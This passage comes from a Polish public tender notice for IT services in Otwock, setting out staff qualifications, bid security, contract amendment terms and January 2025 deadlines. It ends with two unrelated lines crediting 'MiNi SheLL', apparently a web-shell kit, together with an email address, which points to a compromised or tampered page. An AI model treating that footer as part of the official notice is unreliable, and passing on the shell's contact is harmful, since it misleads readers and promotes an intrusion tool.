certyfikatu bezpieczeństwa OPWSWAT lub równorzędnego:<br/>Za równoważny uznaje się certyfikat wystawiany przez niezależną instytucję posiadającą uprawnienia do potwierdzania kompetencji w obszarze bezpieczeństwa systemów informatycznych. Certyfikat równoważny musi dotyczyć tego samego obszaru kwalifikacji, a jego uzyskanie musi wiązać się z przejściem procedury certyfikacyjnej takiej samej jak w przypadku certyfikatu porównywanego,<br/>	umiejętność pracy w zespole, w tym komunikatywność, pozwalająca na sprawną realizację powierzonych zadań,<br/>	samodzielność w realizacji zadań, w tym umiejętność szukania rozwiązań dla trudnych zadań,<br/>	umiejętność analitycznego oraz krytycznego myślenia,<br/>	umiejętność kreatywnego myślenia i generowania rozwiązań optymalnych dla bezpieczeństwa IT w organizacji przy jednoczesnym minimalnym koniecznym nakładaniu ograniczeń na użytkowników. <br/><br/>Wsparcie infrastruktury (helpdesk)		wykształcenie m.in. średnie techniczne,<br/>	znajomość systemów Microsoft Windows 10 oraz Windows 11,<br/> znajomość zagadnień związanych z budową i funkcjonowaniem sprzętu komputerowego,<br/>	wiedza z zakresu sieci LAN oraz funkcjonowania protokołu TCP/IP,<br/>	znajomość usług Active Directory w kontekście zarządzania uprawnieniami użytkowników domenowych,<br/>	co najmniej 2-letnie doświadczenie w pracy na stanowisku typu helpdesk w zakresie:<br/>a) zarządzania systemami Windows 10 i/lub Windows 11,<br/>b) rozwiązywania problemów ze sprzętem i oprogramowaniem, w środowisku składającym się z przynajmniej 20 hostów,<br/>	dodatkowe kompetencje:<br/>a)	doświadczenie w pracy z systemami do zarządzania zgłoszeniami i zasobami,<br/>b)	umiejętność pracy w zespole, <br/>w tym komunikatywność, pozwalająca na sprawną realizację powierzonych zadań,<br/>c)	samodzielność w realizacji zadań, w tym umiejętność szukania rozwiązań dla trudnych zadań,<br/>d)	umiejętność priorytetyzacji spływających od użytkowników zgłoszeń oraz próśb. <br/>administrowanie siecią komputerową		min. 3 lata doświadczenie w realizacji zadań z obszaru administrowania sieciami komputerowymi,<br/>	znajomość protokołów sieciowych TCP/IP,<br/>	umiejętność zarządzania urządzeniami sieciowych LAN oraz SAN,<br/>	znajomość systemów kopii zapasowych oraz systemów składowania danych,<br/>	znajomość technologii wirtualizacji,<br/>	znajomość języka angielskiego umożliwiająca korzystanie z dokumentacji technicznej,<br/>	umiejętność pracy w zespole, <br/>w tym komunikatywność, pozwalająca na sprawną realizację powierzonych zadań,<br/>	samodzielność w realizacji zadań, w tym umiejętność szukania rozwiązań dla trudnych zadań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – wzór oświadczenia dla Wykonawcy przygotowano bezpośrednio na platformie – formularz własny.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające <br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/><br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 5 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	W każdym czasie obowiązywania Umowy Strony są uprawnione do dokonania nieistotnych zmian Umowy. Za nieistotną zmianę Umowy Strony traktują zmianę inną niż zmiana istotna zdefiniowana w art. 454 ust. 2 ustawy Pzp.<br/>2.	Niezależnie od postanowienia ust. 1 powyżej, w przypadku wykrycia, po zawarciu Umowy, oczywistej omyłki pisarskiej lub rachunkowej w treści Umowy, w tym załącznikach do Umowy, dotyczącej w szczególności wynagrodzenia należnego Wykonawcy lub terminu wykonania poszczególnych czynności w ramach Umowy, Strony są uprawnione do dokonania zmiany Umowy w zakresie poprawienia oczywistej omyłki pisarskiej lub rachunkowej.<br/>3.	Strony są uprawnione do dokonania zmiany Umowy w razie zaistnienia następujących okoliczności i w poniższym zakresie:<br/>1)	zmiany zasad i trybu realizacji Przedmiotu Umowy – w przypadku zmian technicznych lub organizacyjnych po stronie Zamawiającego,<br/>2)	Siły Wyższej uniemożliwiającej wykonanie Przedmiotu Zamówienia w terminie – w zakresie zmiany terminu realizacji terminów Umowy,<br/>3)	w przypadku konieczności wprowadzenia zmian wynikających ze zmiany założeń strategicznych Zamawiającego odnośnie Przedmiotu Umowy, które w istotny sposób wpływają na sposób realizacji Umowy lub gdy w celu prawidłowego wykonania Przedmiotu Umowy niezbędna jest zmiana sposobu wykonania Przedmiotu Umowy, <br/>o której Strony nie mogły wiedzieć w chwili podpisania Umowy – dopuszcza się zmianę w sposobie realizacji Przedmiotu Umowy w zakresie niezbędnym do dostosowania go do nowych założeń Zamawiającego i umożliwiającym prawidłową realizację Przedmiotu Umowy oraz dopuszcza się wówczas możliwość zmiany terminów określonych w Umowie.<br/>4.	W przypadku zaistnienia okoliczności, które uzasadniają dokonanie zmian Umowy, o których mowa w ust. 3, każda ze Stron może zwrócić się do drugiej Strony w formie pisemnej <br/>z wnioskiem o zmianę Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-08 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com